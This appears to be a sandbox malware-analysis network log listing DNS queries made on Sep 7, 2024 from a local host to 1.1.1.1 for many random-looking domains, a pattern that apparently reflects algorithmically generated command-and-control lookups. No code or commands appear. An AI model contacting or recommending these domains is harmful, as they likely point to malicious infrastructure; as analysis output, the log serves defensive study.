                                                                                                                                                                                                            Sep 7, 2024 15:34:43.504169941 CEST192.168.2.31.1.1.10x179aStandard query (0)owpuc.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.742413044 CEST192.168.2.31.1.1.10xd63bStandard query (0)mxeye.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.883780956 CEST192.168.2.31.1.1.10x9bf5Standard query (0)ulwbq.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.104566097 CEST192.168.2.31.1.1.10x7115Standard query (0)ulwbq.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.398727894 CEST192.168.2.31.1.1.10xc6aeStandard query (0)iksgub.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.673911095 CEST192.168.2.31.1.1.10xf530Standard query (0)iksgub.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.805222988 CEST192.168.2.31.1.1.10x4e0fStandard query (0)skkawq.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.929852009 CEST192.168.2.31.1.1.10x14d4Standard query (0)quoxyyhgwkw.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:48.086056948 CEST192.168.2.31.1.1.10x6060Standard query (0)kuhoi.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:48.347778082 CEST192.168.2.31.1.1.10x6311Standard query (0)kuhoi.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:48.461164951 CEST192.168.2.31.1.1.10x6d14Standard query (0)znful.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:48.473552942 CEST192.168.2.31.1.1.10xc689Standard query (0)znful.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:48.601716995 CEST192.168.2.31.1.1.10xf68cStandard query (0)nuijfgm.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:48.640876055 CEST192.168.2.31.1.1.10x42aeStandard query (0)nuijfgm.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.033420086 CEST192.168.2.31.1.1.10x4c94Standard query (0)owzuhlkauoavrg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.066097975 CEST192.168.2.31.1.1.10x8d2Standard query (0)owzuhlkauoavrg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.351706982 CEST192.168.2.31.1.1.10x3c21Standard query (0)goqcygcoo.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.476728916 CEST192.168.2.31.1.1.10xfa48Standard query (0)kamqc.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.648726940 CEST192.168.2.31.1.1.10x58ccStandard query (0)kamqc.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.929816008 CEST192.168.2.31.1.1.10x8807Standard query (0)jkknameib.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:52.273679018 CEST192.168.2.31.1.1.10x8271Standard query (0)pwoawmujdqwzs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:52.380508900 CEST192.168.2.31.1.1.10x8019Standard query (0)pwoawmujdqwzs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:52.586317062 CEST192.168.2.31.1.1.10x4ec4Standard query (0)exmqudoi.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:52.757949114 CEST192.168.2.31.1.1.10xe579Standard query (0)exmqudoi.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:53.039171934 CEST192.168.2.31.1.1.10x1f1fStandard query (0)dqagvyickrk.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:53.074223995 CEST192.168.2.31.1.1.10x1f81Standard query (0)dqagvyickrk.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:53.212034941 CEST192.168.2.31.1.1.10x2704Standard query (0)useeru.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:53.387341022 CEST192.168.2.31.1.1.10x17a9Standard query (0)useeru.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:53.726723909 CEST192.168.2.31.1.1.10x5a0eStandard query (0)xqeappl.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:54.599335909 CEST192.168.2.31.1.1.10xe4a0Standard query (0)xqeappl.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:54.945422888 CEST192.168.2.31.1.1.10x3edbStandard query (0)wkuzdqsoiwy.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:54.966625929 CEST192.168.2.31.1.1.10xb872Standard query (0)wkuzdqsoiwy.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.399301052 CEST192.168.2.31.1.1.10x26efStandard query (0)ioiqqswzikfqu.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.680939913 CEST192.168.2.31.1.1.10x6070Standard query (0)ioiqqswzikfqu.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.804838896 CEST192.168.2.31.1.1.10x7c17Standard query (0)ypnuaffmx.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.977008104 CEST192.168.2.31.1.1.10xf532Standard query (0)oigusewa.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.102559090 CEST192.168.2.31.1.1.10x3f8bStandard query (0)ocjaqgnsqfgp.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.353182077 CEST192.168.2.31.1.1.10xbf8aStandard query (0)ocjaqgnsqfgp.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.695441008 CEST192.168.2.31.1.1.10xaaceStandard query (0)pmoodvkmiigul.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.836014986 CEST192.168.2.31.1.1.10x1d61Standard query (0)ndqcy.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.054852962 CEST192.168.2.31.1.1.10x198dStandard query (0)hvvgycugwh.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.266433001 CEST192.168.2.31.1.1.10xd13dStandard query (0)hvvgycugwh.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.633197069 CEST192.168.2.31.1.1.10x3b81Standard query (0)esqkgcss.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.867140055 CEST192.168.2.31.1.1.10xaefdStandard query (0)ithzdymit.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:03.056787014 CEST192.168.2.31.1.1.10xf26aStandard query (0)ithzdymit.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:03.336199999 CEST192.168.2.31.1.1.10x87eStandard query (0)uvwabzkyifixf.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:03.517728090 CEST192.168.2.31.1.1.10xc865Standard query (0)uvwabzkyifixf.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:03.790551901 CEST192.168.2.31.1.1.10x861cStandard query (0)kuikdooag.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:03.842611074 CEST192.168.2.31.1.1.10xf5e4Standard query (0)kuikdooag.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:04.008194923 CEST192.168.2.31.1.1.10x804dStandard query (0)kpntwewjtai.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:04.291136026 CEST192.168.2.31.1.1.10x460cStandard query (0)kpntwewjtai.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:04.648567915 CEST192.168.2.31.1.1.10x2cc6Standard query (0)kwfciphqs.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:04.686811924 CEST192.168.2.31.1.1.10xa22cStandard query (0)kwfciphqs.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:04.824429035 CEST192.168.2.31.1.1.10xe69bStandard query (0)xugukhmkcsvw.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:04.880748987 CEST192.168.2.31.1.1.10xf622Standard query (0)xugukhmkcsvw.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:05.033940077 CEST192.168.2.31.1.1.10x19f2Standard query (0)nukeecapkuanq.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:05.104228020 CEST192.168.2.31.1.1.10x26efStandard query (0)nukeecapkuanq.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:05.263096094 CEST192.168.2.31.1.1.10x1438Standard query (0)gyjdfapyghm.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:05.296425104 CEST192.168.2.31.1.1.10x98a0Standard query (0)gyjdfapyghm.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:05.680516958 CEST192.168.2.31.1.1.10xa4dbStandard query (0)oooaehqkyge.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:05.947834015 CEST192.168.2.31.1.1.10x8f60Standard query (0)oooaehqkyge.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:06.228741884 CEST192.168.2.31.1.1.10x78ccStandard query (0)wcwxa.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:06.678816080 CEST192.168.2.31.1.1.10x4a11Standard query (0)wcwxa.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.367291927 CEST192.168.2.31.1.1.10x186eStandard query (0)taiqjio.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:08.539671898 CEST192.168.2.31.1.1.10x5d2Standard query (0)qaeebwmdz.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:08.652331114 CEST192.168.2.31.1.1.10x4838Standard query (0)qaeebwmdz.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:08.837205887 CEST192.168.2.31.1.1.10x21c9Standard query (0)qcqdo.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:08.852313995 CEST192.168.2.31.1.1.10x6581Standard query (0)qcqdo.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:08.980437040 CEST192.168.2.31.1.1.10x3f3aStandard query (0)yklznhasrec.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:10.211081982 CEST192.168.2.31.1.1.10x7500Standard query (0)kcvsysu.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:10.325246096 CEST192.168.2.31.1.1.10x1d20Standard query (0)kcvsysu.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:10.524601936 CEST192.168.2.31.1.1.10x6299Standard query (0)fbkzqsqod.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:10.707549095 CEST192.168.2.31.1.1.10xe1ccStandard query (0)fbkzqsqod.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.100004911 CEST192.168.2.31.1.1.10x388fStandard query (0)sbpgpqw.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:12.463551044 CEST192.168.2.31.1.1.10x75baStandard query (0)kuchksikknk.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:13.472991943 CEST192.168.2.31.1.1.10xe47aStandard query (0)kuchksikknk.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:13.621117115 CEST192.168.2.31.1.1.10x9906Standard query (0)ggaksi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:13.681674004 CEST192.168.2.31.1.1.10x4d61Standard query (0)ggaksi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:13.820326090 CEST192.168.2.31.1.1.10xc3adStandard query (0)canqk.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.074525118 CEST192.168.2.31.1.1.10x79e0Standard query (0)canqk.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.367537022 CEST192.168.2.31.1.1.10x454fStandard query (0)gnwseqckkmly.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.493788958 CEST192.168.2.31.1.1.10x97ccStandard query (0)umwkoadmhbrsv.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.649910927 CEST192.168.2.31.1.1.10xf2c0Standard query (0)mauzahxbhdyxg.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.670865059 CEST192.168.2.31.1.1.10xb9dbStandard query (0)mauzahxbhdyxg.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.789272070 CEST192.168.2.31.1.1.10x92caStandard query (0)garuyix.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.929928064 CEST192.168.2.31.1.1.10xe38cStandard query (0)biguscy.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:19.117528915 CEST192.168.2.31.1.1.10x7a3bStandard query (0)mokurs.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:19.146959066 CEST192.168.2.31.1.1.10x83b5Standard query (0)mokurs.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:19.835948944 CEST192.168.2.31.1.1.10xed5eStandard query (0)raqumygq.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:20.180841923 CEST192.168.2.31.1.1.10x601dStandard query (0)raqumygq.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:20.305366993 CEST192.168.2.31.1.1.10x2cbbStandard query (0)yuyoyuv.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:20.345472097 CEST192.168.2.31.1.1.10x7349Standard query (0)yuyoyuv.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:20.464687109 CEST192.168.2.31.1.1.10x51c4Standard query (0)kikcvucesim.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:20.651670933 CEST192.168.2.31.1.1.10x8839Standard query (0)kikcvucesim.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:20.945980072 CEST192.168.2.31.1.1.10xe7deStandard query (0)kcscgoyucqmkq.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:21.228688002 CEST192.168.2.31.1.1.10x2243Standard query (0)kcscgoyucqmkq.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:21.352878094 CEST192.168.2.31.1.1.10x6cadStandard query (0)yktgacfquni.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:21.392052889 CEST192.168.2.31.1.1.10xafd7Standard query (0)yktgacfquni.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:21.523459911 CEST192.168.2.31.1.1.10xacedStandard query (0)cczqvvmimawca.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.539344072 CEST192.168.2.31.1.1.10xacedStandard query (0)cczqvvmimawca.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.573402882 CEST192.168.2.31.1.1.10xfaceStandard query (0)cczqvvmimawca.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.742230892 CEST192.168.2.31.1.1.10xe0d2Standard query (0)btnmut.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.944164991 CEST192.168.2.31.1.1.10x38c4Standard query (0)btnmut.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:24.586899996 CEST192.168.2.31.1.1.10x3200Standard query (0)gdogxorcsmzygq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:24.756530046 CEST192.168.2.31.1.1.10xb800Standard query (0)gdogxorcsmzygq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:25.054883957 CEST192.168.2.31.1.1.10xc586Standard query (0)zmiqslgt.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:25.067303896 CEST192.168.2.31.1.1.10xa770Standard query (0)zmiqslgt.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:25.180449009 CEST192.168.2.31.1.1.10x1385Standard query (0)rivawyyqgqsd.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:25.377437115 CEST192.168.2.31.1.1.10x62f2Standard query (0)rivawyyqgqsd.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:25.664405107 CEST192.168.2.31.1.1.10xddeaStandard query (0)vrkofomkuzuymp.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:26.872709990 CEST192.168.2.31.1.1.10x9522Standard query (0)mpdiexrzqka.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:26.973640919 CEST192.168.2.31.1.1.10x659dStandard query (0)mpdiexrzqka.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:27.398929119 CEST192.168.2.31.1.1.10x3d31Standard query (0)dekso.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:27.436475992 CEST192.168.2.31.1.1.10xdcd1Standard query (0)dekso.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:27.556766987 CEST192.168.2.31.1.1.10x8612Standard query (0)nswqqljcwe.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:27.632170916 CEST192.168.2.31.1.1.10x3b38Standard query (0)nswqqljcwe.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:27.820414066 CEST192.168.2.31.1.1.10xc052Standard query (0)yxnavcmgurrhw.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:28.137304068 CEST192.168.2.31.1.1.10x67feStandard query (0)yxnavcmgurrhw.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:28.268042088 CEST192.168.2.31.1.1.10xde9Standard query (0)esdryukcayyoq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:29.445657969 CEST192.168.2.31.1.1.10xc23aStandard query (0)uwkmq.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:29.500750065 CEST192.168.2.31.1.1.10x64c3Standard query (0)uwkmq.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:29.618861914 CEST192.168.2.31.1.1.10x44e6Standard query (0)uwygduzzqaosv.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:29.719528913 CEST192.168.2.31.1.1.10x9748Standard query (0)uwygduzzqaosv.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:30.664086103 CEST192.168.2.31.1.1.10xa201Standard query (0)igdqs.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:31.077133894 CEST192.168.2.31.1.1.10xb118Standard query (0)igdqs.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:31.351939917 CEST192.168.2.31.1.1.10x6613Standard query (0)chafwe.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:31.529047966 CEST192.168.2.31.1.1.10xc19cStandard query (0)chafwe.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:31.992810965 CEST192.168.2.31.1.1.10x87b8Standard query (0)lmmeeoyzyn.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:33.149463892 CEST192.168.2.31.1.1.10x883aStandard query (0)bgneigegyqofu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:33.426098108 CEST192.168.2.31.1.1.10x2edcStandard query (0)bgneigegyqofu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:33.699814081 CEST192.168.2.31.1.1.10xc2e4Standard query (0)arpjmckwt.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:33.715578079 CEST192.168.2.31.1.1.10x6f49Standard query (0)arpjmckwt.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:33.867356062 CEST192.168.2.31.1.1.10x425bStandard query (0)okocqpi.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:34.034084082 CEST192.168.2.31.1.1.10x4c57Standard query (0)okocqpi.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:34.320641994 CEST192.168.2.31.1.1.10xf9e2Standard query (0)qqemsidggcmy.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:34.662909031 CEST192.168.2.31.1.1.10x4cfdStandard query (0)qqemsidggcmy.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:34.945815086 CEST192.168.2.31.1.1.10xd3d4Standard query (0)kvdvmc.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:34.983177900 CEST192.168.2.31.1.1.10x5f60Standard query (0)kvdvmc.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:35.129496098 CEST192.168.2.31.1.1.10x75eeStandard query (0)czcceggoa.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:36.289119005 CEST192.168.2.31.1.1.10xeba7Standard query (0)eimef.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:36.301255941 CEST192.168.2.31.1.1.10xa3f5Standard query (0)eimef.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:36.414067984 CEST192.168.2.31.1.1.10x82c7Standard query (0)ovonq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:36.611274958 CEST192.168.2.31.1.1.10xfbf9Standard query (0)ovonq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:36.930227995 CEST192.168.2.31.1.1.10xe706Standard query (0)zitfawcgy.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:37.197684050 CEST192.168.2.31.1.1.10x9641Standard query (0)zitfawcgy.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:37.351958036 CEST192.168.2.31.1.1.10xcdeeStandard query (0)yiqqmjekm.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:37.522866011 CEST192.168.2.31.1.1.10xcb40Standard query (0)yiqqmjekm.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:37.805058956 CEST192.168.2.31.1.1.10xeef2Standard query (0)quzgmnyiqyqoez.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:37.820467949 CEST192.168.2.31.1.1.10xa275Standard query (0)quzgmnyiqyqoez.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:37.945399046 CEST192.168.2.31.1.1.10xe849Standard query (0)iceqeuhpebkqmj.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:38.223679066 CEST192.168.2.31.1.1.10x600cStandard query (0)iceqeuhpebkqmj.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:38.339636087 CEST192.168.2.31.1.1.10x48baStandard query (0)iefcm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:38.512177944 CEST192.168.2.31.1.1.10xf4b5Standard query (0)iefcm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:38.867820024 CEST192.168.2.31.1.1.10x3c2fStandard query (0)wuduqoeivyo.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:39.150928974 CEST192.168.2.31.1.1.10x9f6cStandard query (0)wuduqoeivyo.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:39.274502993 CEST192.168.2.31.1.1.10xc97Standard query (0)wheasiwvsew.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:39.286974907 CEST192.168.2.31.1.1.10xf448Standard query (0)wheasiwvsew.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:39.414134026 CEST192.168.2.31.1.1.10x6e95Standard query (0)cbgokbq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:40.572505951 CEST192.168.2.31.1.1.10xf554Standard query (0)ysbgwpqywiujo.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:40.780230045 CEST192.168.2.31.1.1.10xe78fStandard query (0)ysbgwpqywiujo.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:42.445400953 CEST192.168.2.31.1.1.10x8be0Standard query (0)lconagoqitcc.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:43.633022070 CEST192.168.2.31.1.1.10xca7bStandard query (0)uryaqqyx.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:43.668987989 CEST192.168.2.31.1.1.10x43f3Standard query (0)uryaqqyx.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:43.820580006 CEST192.168.2.31.1.1.10x1723Standard query (0)mdabyu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:43.989660978 CEST192.168.2.31.1.1.10xf0e0Standard query (0)mdabyu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:44.257972956 CEST192.168.2.31.1.1.10xe2bcStandard query (0)zhvaaoijau.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:45.429932117 CEST192.168.2.31.1.1.10x999aStandard query (0)fyumrag.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:46.617607117 CEST192.168.2.31.1.1.10x644cStandard query (0)qodpaim.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:46.645337105 CEST192.168.2.31.1.1.10x7825Standard query (0)qodpaim.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:46.775021076 CEST192.168.2.31.1.1.10xffc9Standard query (0)umoezuoxkf.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:46.799592018 CEST192.168.2.31.1.1.10xb9b9Standard query (0)umoezuoxkf.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:46.914047003 CEST192.168.2.31.1.1.10x4545Standard query (0)oxcua.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:47.020447016 CEST192.168.2.31.1.1.10x70eaStandard query (0)oxcua.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:47.227046013 CEST192.168.2.31.1.1.10x55e1Standard query (0)atewnko.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:35:48.382961035 CEST192.168.2.31.1.1.10xd4b6Standard query (0)audewc.mpA (IP address)IN (0x0001)false
